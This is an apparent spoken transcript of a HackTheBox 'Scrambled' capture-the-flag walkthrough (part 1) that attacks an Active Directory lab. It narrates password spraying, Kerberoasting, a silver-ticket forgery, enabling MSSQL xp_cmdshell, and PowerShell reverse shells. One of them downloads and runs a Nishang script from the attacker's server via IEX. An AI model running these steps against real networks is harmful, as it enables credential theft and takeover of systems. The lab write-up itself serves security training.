Well, hello everyone, welcome back guys. Hope you all are doing well, and today we are going to solve another machine from Hackthebox. The machine name is Scrambled and the difficulty level of this machine is medium. I'm super excited for this machine because this is typical Active Directory machine and we are going to do a lot and we will see a lot in terms of Active Directory exploits, right? So without wasting time, let's go and we will start our machine today with nmap. So nmap space -sv for version enumeration, space -sc for default scripts, space capital T for timing template, and I am going to specify its value is 4, and space capital A for aggressive scan, and the target IP is 10.10.11.168, and I want to save the scan results in aggr.nmap file. I already ran the scan to save the time, so I'm just going to show you the scan results. So a lot of ports open. So as we can see, port number 53, which is default for DNS, and port state is open. It's using simple DNS plus. Port number 80, which is default for HTTP, and it's using Microsoft IIS HTTPD 10.0. And here you can see the title is Scrambled Corp Intranet. So I already created a record. As you can see here, port number 88, which is Kerberos-sec, it's also open. 135, 139, LDAP port is also open. And the interesting part here, we have this domain name, and this is actually the fully qualified domain name for domain controller. So DC stands for domain controller, and here it's domain controller 1.scrm.local. I already created that record in etc host file, so here you can see I can access this with the name. Now 445, okay, 636 SSL LDAP. Again, here you have dc1.scrm.local, and the interesting port is this 1433, which is MSSQLS. Its state is open, and it's using Microsoft SQL Server 2019 15.00.2000. Okay, 3268 LDAP, 3269 SSL LDAP. And another important part here, as you can see, message signing enabled and required. So let's go. We will see more today with Rust scan space -a, and the target IP is going to be same as before. So if we missed any port in the nmap, we will get that port here. So up to now, whatever port we found in nmap, we also have here. So let it run, and we will go to the web application which is running here, or a website. So we can see here there is index.html, and it's a welcome page and nothing interesting there. Once we go to reports, this is a dead link, and let's go to IT services. Once we click IT services, we get a news and alert, which is due to security breach last month, we have now disabled all Ntlm authentication on our network. This may cause problem for some of the programs you use, so please be patient while we work to resolve any issue. So this is very sensitive information. First of all, we know that because of that security breach, the system admin actually disabled all Ntlm authentication in the network. The second part is they are saying if you are using any kind of program, so be patient. Fine, that means Ntlm authentication is disabled, and while solving this machine, we will take care of this, and we will also see maybe some of the programs running by the users, Active Directory users. Now next thing is contacting IT support. So I'm going to right click and open it in a new tab. So there are some phone number to dial. This seems like local number, and support@scrambledcorp.com. so this is again a new domain name, and I already created this record also in etc host file. Now next thing they are saying, when submitting a support request via email, please include your network information, and what network information they are asking for to put your IP address. Fine. Next thing, new user account form. So open that, and this is new user account form, but you can see here you will get this is actually information gathering, and this part is also good because now you know how many departments are there and what are those departments, like HR, sales, production, administration, right? Required email or not, whatever. But if you fill this form, there is nothing. So let's say Bob, job title IT admin, or we can say sysadmin, and department, let's say administration, manager, and sales app access required. So we cannot click on it. So maybe if we try sales, maybe we can now choose this, but nothing. So we cannot choose this and submit. So it's submitted, but we got nothing. Go to the next one. So report a problem with sales orders app. Right click, open it in new tab, and again, so they are saying that there is one application, as they mentioned here. If you are running any program, so you may face some problem, and this is the program. So if you are experiencing a problem with the sales orders app, please enable debugging logging and reproduce the problem. You can enable debugging login by doing the following steps. So by clicking this, so Scrambled debug log, we need to keep in mind about this also. Last but not least, request a password reset. So our self-service password reset system will be up and running soon, but in the meantime, please call the IT support line and we will reset your password. If no one is available, please leave a message stating your username and we will reset your password to be the same as the username. And this is problem. This is really big problem, because by reading this message, I can go for the user enumeration. I will try to gather as much username as I can, and I will try one by one. I will create a user list and I will go for the password spray. So, and that's what we are going to do here, because Ntlm authentication is disabled. So we will go for the curb roasting. Now, if we see this result closely, we can see we did not get this port. Fine. And this port we found here. Where? Here. You can see that. So 4411. That means on this port, they are running sales order app, right? So I also ran nmap scan on this port. So if I show you cat4411.nmap and hit enter, you can see there is something Java RMI, Kerberos, and LDAP bind request, LDAP search request, and MS SQL -s. It's running Oracle TNS. So that's been said. We will see that in a minute. But now we will start from the curb roasting. So for the curb roasting, I already have that curb root, and if I say username and let's say -d for the domain, so scrm.local -dc So the domain controller IP is 10.10.11.168, and now the user list. So user share word list, I'm going to use seclist. Inside seclist there is usernames, and inside username there is Zato 10 million's username, and hit enter. So whatever usernames are there, it is going to pick one by one, and it's going to enumerate that user. So that may take a bit time. Let's see, I will pause the video, but I want here to show you at least one user. So as you can see, the valid user is administrator at scrm.local. So similarly, it is going to see all the usernames from this list, and this is a very big list. So it is going to take time, and I'm going to pause the video and come back once it's finished. Welcome back, guys, and as you can see, we got bunch of users. Now what I'm going to do, according to the password reset instruction, if no one is available, please leave message stating your username, and we will reset your password to be same as the username. So considering this part, what we are going to do is we are going to create a username list, and we are going to use password spray functionality of this Scrambled tool, right? So what I'm going to do, let's say nano users dot text, and the users we have is administrator, second user is a Smith, third user is again administrator, so I'm not gonna write it, but gel and S Jenkins and CHICKS, and the last one is Sqlsvc. Okay, so just save that, and now I'm going to Control C that, clear, and let's say opt and Scrambled, and now I'm going to use the password spray feature, which is password spray, and I need to specify the domain name, which is scrm.local, and then specify the domain controller IP, which is going to be 10.10.11.168, and then the username list, which we already created, and the password. So one by one we can cat users.text, and here you can see the first one is administrator. Let's spray the password as administrator for all the users. So it will take this password administrator and choose one by one user of this list and try to match that password. So administrator and hit enter. So testing done, 6 login attempts, but no one succeeded. Let's try the next one, and the next one is A Smith. So hit enter, again 6 login attempts, but nothing succeeded. Clear. Let's try S Jenkins, again the same result. Let's try kicks, same. The last one is Sqlsvc, and hit enter, and this time, as you can see, we successfully got one valid user credential. That means this user has password as his username, which is Sqlsvc. So this is the good one. I'm going to take this, copy that, and I'm gonna paste it here. So now we got user. Let's try something else. As we know, Ntlm is disabled, so the other method is we can grab the TGT. So to get the TGT, what we can do here is get TGT. There are two, TGS and TGT. So once a user is going to access any service, okay, then it is going to ask the ticket granting service from the KDC, which is Key Distribution Center, and that key distribution center is actually the domain controller. So first of all, the user is going to ask for the TGT, and once it's get the TGT, then to get the TGS, which is ticket granting service, that user have to pass its TGT. But here we are going to get the TGT, not TGS. So space -h, let's see the switches. So these are the switches. To get actually what I am going to find here, what I'm going to do here is I'm going to get the Sqlsvc file. So the Sqlsvc file is a storage of TGT ticket for a specific user. So I'm going to generate this Sqlsvc file for the Sqlsvc user, right? And we are going to try this first method, right, which is Kerberos plus password. So clear that and get TGT Kerberos plus password, and then : / scrm dot local, and then the username Sqlsvc, and its password, which is again Sqlsvc. This spelling is a bit confusing. Each time I get confused. So, and here I'm going to pass the target IP. Fine. Now close it with double quotes, and let's say Sqlsvc. Hit enter, and we should have Sqlsvc file. So here we have Sqlsvc file, right? Now wherever we want to authenticate with this user, we can pass this Sqlsvc file, right? So now suppose if we want to access, because let's try to access the SMB shares first. So we are again going to use Impacket SMB client. So SMB client, and for that we need to specify the domain name, which is scrm.local and /ksimppson. Fine. And @ 10.10.11.168. This is the target IP, which is domain controller. Space -k space no password, right? And if I show you the switches here, clear Impacket SMB client space -h. Okay, it's here. So space -k, where we use space -k to use the Kerberos authentication, and it's going to grab the credentials from Sqlsvc file, and for this we have to use kerb5 cname, which is canonical name based on target parameter. Fine. So in that case, once you are using the Kerberos authentication with the Sqlsvc file, at that instant you do not need to pass any password, and you do not need to pass any hashes. And here what we are following the instructions from here, that Ntlm, where is it? Ntlm authentication is disabled. So because Ntlm authentication is disabled, that's why we are working with the Kerberos. And to use the Kerberos authentication, we are using Sqlsvc file, right? So just hit enter. Oh, but this is not going to work. Why? Because it's not getting the Sqlsvc file. So after getting the Sqlsvc file, you have to export this file. So export krb5c cname equal to Sqlsvc file, which is ccache. Hit enter, and now we can use this authentication. Now whenever we pass -k, at that instant it is going to see the Sqlsvc file. So here we have the problem. The problem is Kerberos session error, KDC error principal unknown, server not found in Kerberos database. What we messed up. So scrm.local ksimpson. Okay, let's try another way. Instead of passing here this IP, let's try dc1.scrm.local and hit enter. Yeah, this time that works. So if I say shares, so all these shares we have. Okay, so there is admin, C, HR, IPC, IT is interesting, public is interesting, sales interesting, sys volume is again very, very interesting, because I don't think this server, this target server is this target server version of Windows is less than server 2012. If this server is server 2012 or less than that, in that case we will try GPP and C password attacks. You can go for sys volume and you will see, maybe you will get the groups.xml file. Okay, so let's see, use IT. So we cannot access IT because access denied. Let's try use public, and yeah, we can access public ls, and there is one PDF which is network security changes.pdf. So let's get this network security PDF. And okay, now let's try another one, use sales and access denied. So that means we can only access the public one, and let's try sysvol, hit enter, and we can also access sysvol. So there is scrm.local, cd scrm.local, ls, and there are policies and scripts. So you can go there, cd cd policies, ls, and there are a bunch of policies. So you can go and see what are the files, what kind of directory structure is there. I also tried that, but there is no GPP. So that's it. Exit, come on the point, and now let's try to see what we have here. So open it, desktop, and HTTP scrambled open. This is okay. So Scrambled Corp, additional security measures for all employees. As you may have heard, our network was recently compromised and an attacker was able to access all of our data. We have identified the way the attacker was able to gain access and have made some immediate changes. You can find these listed below along with the ways these changes may impact you. So the changes are done by the attacker are here, as the attacker used something known as Ntlm relaying. So we have disabled Ntlm authentication across the entire network. We already know that. Next one, workaround. So when you log on or access network resources, you will now be using Kerberos authentication, which is definitely 100% secure and has absolutely no way anyone could exploit it. This will require you to use the full domain name, okay, with your username changes. The attacker was able to retrieve credentials from an SQL database. That is interesting because we know that SQL database is published on 1433 port number used by our HR software. So we have removed all access to the SQL service for everyone apart from network administrator. Okay. If you can no longer access the HR software, please contact us and we will manually grant your account access again. After running the Kerberos tool, my idea was to get the service principal name or if there is any service account. So let's go and we will do that with impacket again. Impacket space hyphen get user SPNs, and if we see here the switches, get user SPNs space hyphen h. Okay, so scrm dot local, which we need to specify, then KSIMPSON, this is the username. And the next thing is, because we are not using Ntlm, we are using Kerberos, and we already exported the C cache file, so we don't need to provide the password. Otherwise we have to provide the password like this, PASSWORD, and whatever the password for Sqlsvc. So here we are not going to specify the password for Sqlsvc, although we are going to specify space hyphen DC, space hyphen DC, I think. Here you can find it, hyphen DC hyphen IP. So hyphen DC hyphen IP. So dc1.scrm.local, fine, and space hyphen D, which is going to be the domain controller, D for the domain, but we already defined here the domain, so no need for that. And here also we don't have D option because we already defined domain name here, right? Again we are going to use space hyphen K and no pass, so hyphen no hyphen pass pass, and we need to request for TGS. We got the TGT. Now this time we are going to request for the ticket granting service ticket, so space hyphen request request and hit enter. So as we hit enter, we got some exception must derive from base exception. So I'm going to copy this and come here on Google, just paste that, and let's say here impacket get user SPN. So once you read this issue, you will know everything. The problem is coming here. Why? Because if we put here similarly, once we access impacket SMB client, once we try IP address instead of this domain controller fully qualified domain name, we got some error, right? And SMB client cannot get connect with the shares. So similarly here, if we put the IP address, it is not going to work. We have to put this fully qualified domain name, and once we put the fully qualified domain name, we got this exception error. So once we search that exception, we find here that once we are using Kerberos, at that instant we are going to get this error. And to solve this error, what you have to do, you have to put some changes in the get user SPNs file. So here what we are going to do is locate impacket hyphen get user SPNs. Where is it? It's there. So user bin impacket get user SPN. So if we say nano and paste that part, hit enter. So it's not there. It's saying it is here. So I'm going to copy this, exit that, and let's say mousepad and paste that, hit enter. Oh no, that's not there. It should be get user SPNs, hit enter. No, that's not there. Don't save. It should be .py, or you can go with the file manager. This is the path, user share doc python 3 impacket examples. Inside examples, this is the file, get user spn.py. So once you go to this file and you scroll down here. So as you can see here, it's saying get machine name. So instead of machine name, what we need to do here, we need to put that, save it, so that now it will accept the host name or fully qualified domain name of domain controller. So now if we try to access impacket get user spn with the domain name fully qualified domain name, now hit enter, it should work now. And as you can see, it's working, and we got a service principal name and a service account which is Sqlsvc, and this is the hash. So what I'm going to do, I'm going to come on, maybe that will not work. No, we messed up with the terminal. So let's get it one more time, and yeah, this time it's worked. So I'm just going to copy it and create one new file. Let's say nano Sqlsvc -hash, hit enter, and just paste that hash here. So save that, cat SQL. Okay, perfect. Now just go to hashcat space -h and let's grab Kerberos. Hit enter, come here, and what I want to show you here, if I say cat Sqlsvc hash, so you can see here it's Kerb5 TGS, which is Kerberos 5 ticket granting service, and its value is 23. So if you search here, you will search here for the 23, because all of these are for Kerberos, but we are looking for 23, but the ticket is TGS, so this is the TGS. That means we are going to use module 13100. So hashcat space -m 13100 and Sqlsvc hash, and then I'm going to specify the word list, which is user share word list rocku.txt, and hit enter. So it will take a bit time. Again, to save the time, I'm going to pause the video and come back once it's finished. So the hash is cracked now, and you can see this is the password for Sqlsvc user account or service account, sorry. So I'm going to copy this, close this. Okay, so Sqlsvc, this is the username, and the password is Pega, what was that? Pegasus SUS 60, right? Yeah, 60. So this is the password. Now what we can do with this service account, we can dump the hashes. Let's try to dump the hashes. So to dump the hashes, I'm again going to use impacket and secret dumps, right? So impacket secret dumps scrm.local, which is going to be the domain name, and similarly ksimson. Actually, let's try to dump the hashes first with this user account ksimson. Okay, because we already have the Ccache file loaded for this user, So we will try first to dump the hashes with this user, then we will see, maybe we get another user hash. Let's see. So okay, because we don't need to pass the password, so we are directly going to pass dc1.scrm.local, the fully qualified domain name of domain controller. Space -k space -no pass and hit enter. So there is an error. Let's try debug. And we are getting something. So it's again throwing some error, but we have some information. So I'm going to take this information because this maybe we will use later, and I will tell you what this is. So here this is actually the SID for the domain controller, right? And domain SID, this one. Fine. How we can use this? Now we need to actually create the Ntlm hash for the password of Sqlsvc user. And how we will create Ntlm hash for Sqlsvc user, we will see that. Create Ntlm hash online. So this is the first link here. We can click on it, and yeah, this one. So Pegasus 60. This was the password, and this is the Ntlm hash of that password. So copy that back here, paste this here. Now what we are going to do, we are going to use ticketer from impacket, and we will perform the silver ticket attack, so which creates a valid ticket granting service ticket for a service using Ntlm hash of a valid user. Then maybe it is possible to get access to the service account, or to get access to a service, and the service is going to be the MS SQL, Microsoft SQL service. So let's go and we will try the silver ticket. Impacket ticketer, this one. Okay, and here we will see the switches first. So clear and impacket ticketer space -h to see the switches. So these are the switches. So we need SPN, which is service principal name, and we did a bad thing. That's why it's always very important to have everything with you, because we need to use this SPN, and I actually forgot to take this with me. So here, paste that. Now this is the service principal name, we need to use it. Okay. So impacket ticketer, and then space -SPN, and the service principal name is going to be that. Copy and paste that. Fine. Next thing, domain. So space -domain, and domain value is crm.local, then domain SID. So hyphen domain hyphen SID, and domain SID we already have it here, but domain SID we have to put up to here, right? So copy that and paste it here. Next we need Ntlm hash. So nt hash space hyphen nt hash, and the nt hash we already have it too. This is the nt hash for this password. Copy, paste that nt hash. We need user ID, so space hyphen user hyphen ID. So let's say user ID is 500 because this is the domain SID and this is the user ID, right? What else we need? User ID 500. Okay, now we just need to specify which user. Let's say administrator, or wait a moment, Sqlsvc, and hit enter, and it's already created that file here. So if I say ls, so svc.scache. Now if we need to access anything or any service with this account, we need to export that Sqache file, because at that instant you need to use the authentication, Kerberos authentication, as Sqlsvc user. So let's go for it. Export, and here we just need to put Sqlsvc.scache and just hit enter. So now this file is imported. Now wherever you use impacket with space hyphen k switch, it is going to use the Kerberos authentication password for Sqlsvc, right? Now the next part is going to be let's access the MS SQL service, and again we are going to use impacket MS SQL client. Okay, clear impacket MS SQL client space hyphen h. So it's taking time. Let's see, here we have space hyphen dc. Let's see what it needs. Okay, space hyphen k, no password we will use. Instead of domain controller IP address, we will use domain name. So scrm.local, this is going to be the username, space hyphen k for Kerberos authentication, space hyphen no pass, and just hit enter. So it is automatically take the Sqache file of Sqlsvc user account, and we don't need to put anything. There is something. It should be scrm, or not scrm, dc1.scrm, because instead of domain controller IP, we are using fully qualified domain name of domain controller, right? So hit enter. That should work, and yeah, it's working. Now we can access MS SQL. So for MS SQL, let's try select I really forget a lot of things, cannot put anything into my mind. So it should be select name from there is master database. So master.dbo.sys databases. Yeah, databases. So there are master database, temp db, model, msdb, and scrambled hr. So now we need to use scrambled hr database. Hit enter. We are in scrambled hr now. Now let's try to see what this database has all about. So select star from sys objects where x type is equal to capital U, and we have these tables, right? So let's see, first go to employee. First we will check what's inside employee, and then we will go to user import, then timesheets. So select star from employees. There is no employee. Let's see. Select star from user import, the second one, this one, user import. So, and here in user import we found one user, and the username is Sqlsvc. This is again seems like a service account, and we have also the password. And as you can see, if you see here the tags of the column, the name of the columns, you can see this is LDAP user. Fantastic. So this is LDAP user, and this is password for LDAP user. This is domain. Okay, so we are going to take this with us, copy, and come here, paste that user. Okay, save it. So now we have another user. We will see what we can do with this user, but here we can try one more thing. So actually exit, clear, and try again. Okay, I wanted to show you here. Now let's see, enable xp underscore command shell, hit enter. So what this command shell is all about is actually gives you ability to execute commands. If the database gives you ability to enable this feature, then you can execute commands from here. So as you can see here, info dc1, and you can also use this command, show options, and it's already changed its value from 0 to 1, 1 to 1. So just now we need to run a reconfigure, and then we can now execute command by just typing xp underscore cmd shell, and then let's say who am I, hit enter, and boom. So we are Sqlsvc user. So if we can execute command, we can also get the reverse shell by passing the payload of reverse shell. So go back here and come here. Let's say refshells.com. Yeah. So here you can specify your IP. So my IP here is 14.37. You can specify the port number. Let's say I'm gonna get the reverse shell on this port number, and I'm using netcat nc. Operating system is Windows, because we are going to execute this reverse shell payload on Windows machine. And if we go down, PowerShell base 64. So this is complete command, or you can just click here, copy, and then go back, come here. Actually I'm going to open a new terminal, and here I'm gonna listen on nc -nlvp on port number 9090, listening here, and just going to execute the command xp_cmd shell and just paste that payload from here, PowerShell E to there. So just hit enter, it should run, and we should have connection back. So we have the reverse shell now. Who am I? We are Sqlsvc host name, and the host name is DC1. That means we logged in on domain controller, but with the least privilege user or low privilege user. Now we already have another user account, which is LDAP user account, MICSSVC, and we already have the password too. So cd, let's say cd/cd users and ls. So there are administrator, and as you can see, MICSSVC is there, public is there, and Sqlsvc is there. These are only the directories. Actually, if you want to know how many users are there, you can say net user and hit enter. So all these users you have in that machine, but from here also you have the idea, and you can see MISC/SVC user is also here and also here. So now we need to weaponize this shell to get another shell as MISC/SVC user. And how we will do that? We are already in PowerShell. Clear nmap space -sv and space -p 5985. This is the port for WSMan, and 10.10.11.168. Let's see if this port is open or not. If this port is open, we can directly run evilwinrm, and we can log in with this account. And this port is open. So let's go and try. Horizontal. Okay. evilwinrm space -i. This is the target IP. Space -u for the username, which is MISCSVC, space -p, which is going to be this Scrambled x9900. So paste that and just hit enter. So we cannot log in from WinRM. We cannot log in from WinRM. So let's try something else. What we can do, we can use PowerShell, lay of living again. So we create a variable named as pass, and we are going to say convert to -secure string, and secure string, which is going to be the password. So the password is this, right? And then we are going to say as plain text space -force, then creds equal to let's say new object, and the new object is we are going to use system dot management dot automation and dot ps credential, credentials or credential, should be credential, let's see. And here scrm and the username. So the username is MISCSVC comma password, which is inside a variable pass, right? So next thing, we just need to invoke it. So invoke -command command hyphen script block, let's say IEX, and new object net dot web client. And what I'm going to do here to get the reverse shell, I'm going to first of all authenticate ourselves as this user, and then we are going to download the Nishank reverse shell. So here dot download string and http://10.10.14.37, this is my IP, and rev.ps1. so this is going to be the Nishank reverse shell, but I renamed it as rev.ps1. okay, this is done, and here just I'm going to say credential hyphen dollar creds. So because I put the credential here, right? Now space hyphen computer, and the computer is going to be DC1, right? So but before executing these commands, let's first close this. Okay, we don't have here. So first of all, I'm going to get the Nishank reverse shell. So cp, in my opt directory we have it, opt Nishank shells, invoke PowerShell TCP.ps1 and copy it here. So now we have ls, we have here invoke PowerShell. I'm going to move this file as rev.ps1. Hit enter. Now open this file, mousepad rev.ps1, and what we need to do here is we are going to use this one for the reverse shell. Copy that, go to the last and just put it here, paste that, and here we need to change the IP address. So 10.10.14.37 and let the port 4444. So save this file, Control S, close this, and I'm going to start the Python server here. So Python 3 space hyphen m http dot server on port number 80. Hit enter, server is running. What I need here is nc space hyphen nlvp, because I set the reverse shell port on 4444, so I'm listening on it. And here let's run those commands, right? So okay, so the first command is this. So hit enter, take this, copy, paste here, hit enter, and now finally we are going to invoke the command. So copy that, paste it here, and hit enter. So once we hit enter, it should download from my HTTP server this file, and as you can see 200 okay, it's downloaded, and here we get the reverse shell. So if I say who am I, so I am Sqlsvc, that means I'm the user. Host name, now I am logged in as MISC. The host name is DC1, cd desktop, and ls. So user.text is here, type user.text and hit enter, and this is the first flag. user flag. So that's it for this video, and this is the part 1. I'm going to meet you in part 2, where we escalate our privileges to the root user and we will become the anti-authority system. So that's it for this video. See you in the next part. Bye.